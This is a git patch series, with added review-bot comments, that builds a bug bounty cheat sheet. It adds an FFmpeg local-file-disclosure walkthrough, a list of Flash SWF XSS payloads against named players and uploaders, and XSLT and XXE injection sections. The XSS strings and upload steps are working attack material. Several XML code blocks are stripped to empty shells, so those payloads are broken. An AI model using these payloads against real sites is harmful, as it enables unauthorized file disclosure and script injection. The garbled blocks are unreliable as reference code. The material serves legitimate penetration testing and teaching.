From beb7e19ffb5c354e61ac40badbc7cf7977cd50e6 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 17:27:43 +0100 Subject: [PATCH 01/17] Add explanation and PoC for FFmpeg LFD --- cheatsheets/lfi.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/cheatsheets/lfi.md b/cheatsheets/lfi.md index 36c0501..4233520 100644 --- a/cheatsheets/lfi.md +++ b/cheatsheets/lfi.md @@ -21,3 +21,17 @@ ``` /%5c.. ``` + +**FFmpeg Local File Disclosure** + +This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2). + +_Steps to reproduce_ + +1. Please download the script from @neex to your "attacker" instance +2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi` +3. Upload the generated AVI file to your target site (e.g. within a 'video upload page') +4. The target may process the malicious HLS inclusion with FFmpeg on the server-side. +5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video. + +Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner. From a2160dfb7353f7fe60350368684e50a037072994 Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Wed, 27 Sep 2017 18:39:57 +0200 Subject: [PATCH 02/17] Add neutrinoguy to "Contributors" section. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index fb7d14c..7ea23da 100644 --- a/README.md +++ b/README.md @@ -49,3 +49,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) +- [neutrinoguy](https://github.com/neutrinoguy) 
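Review bot: in PATCH 01 (cheatsheets/lfi.md), step 4 of the _Steps to reproduce_ list is a precondition rather than an action, and the list mixes registers ("Please download…", "The target may process…"); move the precondition into the lead sentence (the technique only applies when the target transcodes uploaded media with an FFmpeg build that follows HLS playlist references) and keep every numbered step a single imperative with consistent terminal punctuation. The `file:///etc/hostname` argument in step 2 is a sensible low-impact probe for a proof of concept; say so explicitly so readers demonstrating the issue to a program owner stay with a harmless path. The closing sentence "Alternative scripts exist which may generate different HLS formats…" names none; either cite them or drop it. The `_Steps to reproduce_` heading also departs from the bold `**…**` heading style used for "FFmpeg Local File Disclosure" just above it.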
From 2b28b977e33f53abe13be85f66a84252a9e7af1e Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 17:45:32 +0100 Subject: [PATCH 03/17] [Recon] Add extra web-based tools for web recon --- cheatsheets/special-tools.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index c45896e..5b30de2 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -30,7 +30,13 @@ otherapp.10.0.0.1.nip.io **Reconnaissance** +- https://dnsdumpster.com (DNS and subdomain recon) +- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) +- https://mxtoolbox.com (wide range of DNS-related recon tools) - https://publicwww.com/ (Source Code Search Engine) +- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) +- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) +- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) **Report Templates** From 517e25abe9d8bf7d3a2edd22d4b39ba5600e0ebf Mon Sep 17 00:00:00 2001 From: kuromatae Date: Wed, 27 Sep 2017 18:51:37 +0200 Subject: [PATCH 04/17] Update bugbountyplatforms.md --- cheatsheets/bugbountyplatforms.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md index 82a89f4..a88e7c4 100644 --- a/cheatsheets/bugbountyplatforms.md +++ b/cheatsheets/bugbountyplatforms.md @@ -8,3 +8,4 @@ - [BountyFactory](https://bountyfactory.io/) - [Intigriti](https://intigriti.be/) - [Bugbountyjp](https://bugbounty.jp/) +- [BountyFactory](https://bountyfactory.io/) From fc48602f94fe39925a5e62f1f63507701e7d8ac4 Mon Sep 17 00:00:00 2001 From: kuromatae Date: Wed, 27 Sep 2017 18:54:53 +0200 Subject: [PATCH 05/17] Update bugbountyplatforms.md Added Yogosha --- cheatsheets/bugbountyplatforms.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md index a88e7c4..52f0e09 100644 --- a/cheatsheets/bugbountyplatforms.md +++ b/cheatsheets/bugbountyplatforms.md @@ -8,4 +8,4 @@ - [BountyFactory](https://bountyfactory.io/) - [Intigriti](https://intigriti.be/) - [Bugbountyjp](https://bugbounty.jp/) -- [BountyFactory](https://bountyfactory.io/) +- [Yogosha](https://www.yogosha.com/) From 967d3d53812d94f159040394dd8363b1cc753443 Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Wed, 27 Sep 2017 19:07:59 +0200 Subject: [PATCH 06/17] Add kuromatae to "Contributors" section. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7ea23da..708b753 100644 --- a/README.md +++ b/README.md @@ -50,3 +50,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) +- [kuromatae](https://github.com/kuromatae) From c7775ecdbc27dbf1cfdbde9aa5937d03d4eaa8de Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:45:22 +0100 Subject: [PATCH 07/17] [XSS] Add collection of SWF XSS payloads Sourced from personal notes, Cure53 Flashbang (https://github.com/cure53/Flashbang/blob/master/flash-files/index.html) and other sources --- cheatsheets/xss.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index e62354b..125e038 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md 
@@ -110,6 +110,32 @@ javas cript://www.google.com/%0Aalert(1) [a](javascript:window.onerror=confirm;throw%201) ``` +**Flash SWF XSS** + +- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf` + +- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&` + +- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` + +- FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` + +- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` + +- YUI "io.swf": `/io.swf?yid=\"));}catch(e){alert(document.domain);}//` + +- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` + +- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` + +- Banner.swf (unknown): `/banner.swf?clickTAG=javascript:alert(document.domain);//` + +- JWPlayer (legacy): `/player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` + +- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` + +- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` + **Lightweight Markup Languages** **RubyDoc** (.rdoc) From c0582d53abe41ef319a28af8e99030126808c353 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:48:38 +0100 Subject: [PATCH 08/17] [XSS] clean up Flash payloads and add note --- cheatsheets/xss.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 125e038..4e5593e 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md 
@@ -122,20 +122,22 @@ javas cript://www.google.com/%0Aalert(1) - videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` -- YUI "io.swf": `/io.swf?yid=\"));}catch(e){alert(document.domain);}//` +- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` - YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` -- Banner.swf (unknown): `/banner.swf?clickTAG=javascript:alert(document.domain);//` +- Banner.swf (unknown): `banner.swf?clickTAG=javascript:alert(document.domain);//` -- JWPlayer (legacy): `/player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` +- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` - SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` +_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ + **Lightweight Markup Languages** **RubyDoc** (.rdoc) From 3dc01e25d211f7e223a18f66d994d62ff46ff2ee Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:57:21 +0100 Subject: [PATCH 09/17] [XSS] additional cleanup of Flash refs --- cheatsheets/xss.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 4e5593e..9fd8b26 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md 
@@ -116,7 +116,7 @@ javas cript://www.google.com/%0Aalert(1) - plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&` -- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` +- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -128,7 +128,7 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` -- Banner.swf (unknown): `banner.swf?clickTAG=javascript:alert(document.domain);//` +- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` From afde105029dcfb9c53158db3fecccc930cccd2e9 Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:04:55 +0200 Subject: [PATCH 10/17] Added XSLT Injection --- cheatsheets/xslt | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cheatsheets/xslt diff --git a/cheatsheets/xslt b/cheatsheets/xslt new file mode 100644 index 0000000..5fb2a1d --- /dev/null +++ b/cheatsheets/xslt @@ -0,0 +1,25 @@ +## XSLT Injection + +**Backend infos** + +```xml + + + + xsl:vendor =
+ xsl:version =
+ + +``` + +**Injecting in PHP** + +```xml + + + + + + +``` + From 183d8c6d50092be1c53a77059440c494573289fa Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:05:37 +0200 Subject: [PATCH 11/17] Fixed file name --- cheatsheets/{xslt => xslt.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cheatsheets/{xslt => xslt.md} (100%) diff --git a/cheatsheets/xslt b/cheatsheets/xslt.md similarity index 100% rename from cheatsheets/xslt rename to cheatsheets/xslt.md From b96a10fdc58cf33e8c983103380b2f073e3aac5d Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:09:59 +0200 Subject: [PATCH 12/17] Add XSLT to Cheat Sheet --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 708b753..ba5e64d 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,7 @@ - [Crypto](cheatsheets/crypto.md) - [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) +- [XSLT Injection](cheatsheets/xslt.md) # Contributing From 36f6a47a9050478d62ece1551116f6eca5b93825 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Thu, 28 Sep 2017 10:54:14 +0100 Subject: [PATCH 13/17] [Tools] Add HackerTarget free tools link --- cheatsheets/special-tools.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index 5b30de2..a354f6a 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md 
@@ -34,6 +34,7 @@ otherapp.10.0.0.1.nip.io - http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) - https://mxtoolbox.com (wide range of DNS-related recon tools) - https://publicwww.com/ (Source Code Search Engine) +- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools) - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) From 7201894c2864ac9682d07b3c541c1cda60fd9415 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:33:22 +0300 Subject: [PATCH 14/17] Creating XXE section And adding some payloads:) --- cheatsheets/xxe.md | 59 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cheatsheets/xxe.md diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md new file mode 100644 index 0000000..dce99cc --- /dev/null +++ b/cheatsheets/xxe.md @@ -0,0 +1,59 @@ +LFI Test +``` + + +]>&xxe; +``` + +Blind LFI test (when first case doesn't return anything) +``` + + + +]>&blind; +``` + +Access Control bypass (loading restricted resources - PHP example) +``` + +]> + +``` + +SSRF Test +``` + + +]>&xxe; +``` + +XEE (XML Entity Expansion - DOS) +``` + + + + + + + + + + + + +]> +&lol9; +``` + +XEE #2 (Remote attack - through external xml inclusion) +``` + +]> +3..2..1...&test +``` From 793328b4cf6794f17e10d9068ae4f14e4368afe8 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:39:50 +0300 Subject: [PATCH 15/17] Make bold headings --- cheatsheets/xxe.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md index dce99cc..49ea531 100644 --- a/cheatsheets/xxe.md +++ b/cheatsheets/xxe.md 
@@ -1,4 +1,4 @@ -LFI Test +**LFI Test** ``` ]>&xxe; ``` -Blind LFI test (when first case doesn't return anything) +**Blind LFI test (when first case doesn't return anything)** ``` ]>&blind; ``` -Access Control bypass (loading restricted resources - PHP example) +**Access Control bypass (loading restricted resources - PHP example)** ``` ``` -SSRF Test +**SSRF Test** ``` ]>&xxe; ``` -XEE (XML Entity Expansion - DOS) +**XEE (XML Entity Expansion - DOS)** ``` &lol9; ``` -XEE #2 (Remote attack - through external xml inclusion) +**XEE #2 (Remote attack - through external xml inclusion)** ``` Date: Thu, 28 Sep 2017 17:40:40 +0300 Subject: [PATCH 16/17] Adding link to the XXE section --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ba5e64d..be66466 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,7 @@ - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) +- [RCE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) From 60c998c43dc1eed273f85778f10d59bde4a0e5c6 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:41:00 +0300 Subject: [PATCH 17/17] Fix a typo:) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index be66466..921f75d 100644 --- a/README.md +++ b/README.md @@ -10,7 +10,7 @@ - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) -- [RCE](cheatsheets/xxe.md) +- [XXE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md)
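Review bot: in PATCH 03 (cheatsheets/special-tools.md), the new reconnaissance entries mix two link styles in one list (bare URLs for dnsdumpster, threatcrowd and mxtoolbox next to `[VirusTotal](…)`, `[crt.sh](…)` and `[Google CT](…)`); use the markdown-link form throughout, which PATCH 13's `[HackerTarget Tools](…)` line also follows. The crt.sh and VirusTotal example URLs embed real third-party domains (`%25.uber.com`, `google.com`); point them at the tool's landing page or at a placeholder such as `example.com` so the sheet does not read as a lookup against a specific company. `http://threatcrowd.org` should use `https://` like the other entries if the site supports it.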
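Review bot: in PATCH 04 (cheatsheets/bugbountyplatforms.md), the added line `- [BountyFactory](https://bountyfactory.io/)` duplicates the entry three lines above it, and the commit message `Update bugbountyplatforms.md` does not say what changed. PATCH 05 replaces the duplicate with Yogosha, so squash 04 into 05 and give the result a message such as `Add Yogosha to bug bounty platforms`, so the history never carries the duplicate.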
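Review bot: in PATCH 07 (cheatsheets/xss.md), the FlashMediaElement entry is the only one not wrapped in backticks, because the payload itself contains backticks (alert`1`) and a single-backtick span cannot hold it; markdown's double-backtick delimiter handles exactly this case, e.g. ``flashmediaelement.swf?jsinitfunctio%gn=alert`1` ``. The JWPlayer entry lists two payloads whose paths differ (`/player.swf?playerready=…` and `/player.swf?tracecall=…`); the list should use one form. The Cure53 Flashbang attribution lives only in the commit message; add it as a source line in the file so readers can find the originals, as PATCH 08 later does for the MWR Labs reference.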
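Review bot: in PATCH 08 (cheatsheets/xss.md), the second JWPlayer payload `/player.swf?tracecall=alert(document.domain)` still carries the leading slash that this patch removes from `io.swf`, `banner.swf` and the first `player.swf` entry; change it to `player.swf?tracecall=alert(document.domain)` so the list is uniform.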
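Review bot: in PATCH 09 (cheatsheets/xss.md), "(also works with `Moxie.cdn.swf` and other variants)" in the plUpload MoxiePlayer entry is unverifiable as written; list the file names that were actually tested or drop "and other variants".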
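Review bot: in PATCH 10, the new file is created as `cheatsheets/xslt` without the `.md` extension, so GitHub will not render it as markdown; PATCH 11 renames it, and the two should be squashed. `**Backend infos**` should read `**Backend information**` (or `**Backend fingerprinting**`, which says what the `xsl:vendor` and `xsl:version` probes are for). The `**Injecting in PHP**` block has no accompanying sentence stating what the stylesheet achieves or which PHP XSLT feature it depends on; one line of explanation makes the payload teachable rather than copy-paste. The `## XSLT Injection` heading is a good convention; the XXE sheet added later in this series should follow it.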
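Review bot: in PATCH 14 (cheatsheets/xxe.md), the code fences carry no language tag while cheatsheets/xslt.md in the same series uses ```xml; tag them `xml` for consistent highlighting. The file also has no top-level heading (xslt.md opens with `## XSLT Injection`); add `## XXE` or similar. In `XEE (XML Entity Expansion - DOS)` write `DoS` (denial of service), and since `XEE #2 (Remote attack - through external xml inclusion)` is a different technique from entity expansion, give it a heading that says what it does. `Blind LFI test (when first case doesn't return anything)` should state what "blind" means here (the file content is not reflected in the response), and the filler `3..2..1...&test` in the last block needs a short comment explaining which part is the entity reference. PATCH 15 only bolds the headings, so fold it into this commit.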
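Review bot: in PATCH 16 (README.md), the link for the new sheet is added as `[RCE](cheatsheets/xxe.md)`, leaving two consecutive `RCE` entries pointing at different files; PATCH 17 corrects the label to `XXE`, so squash the two so the series never carries the wrong link.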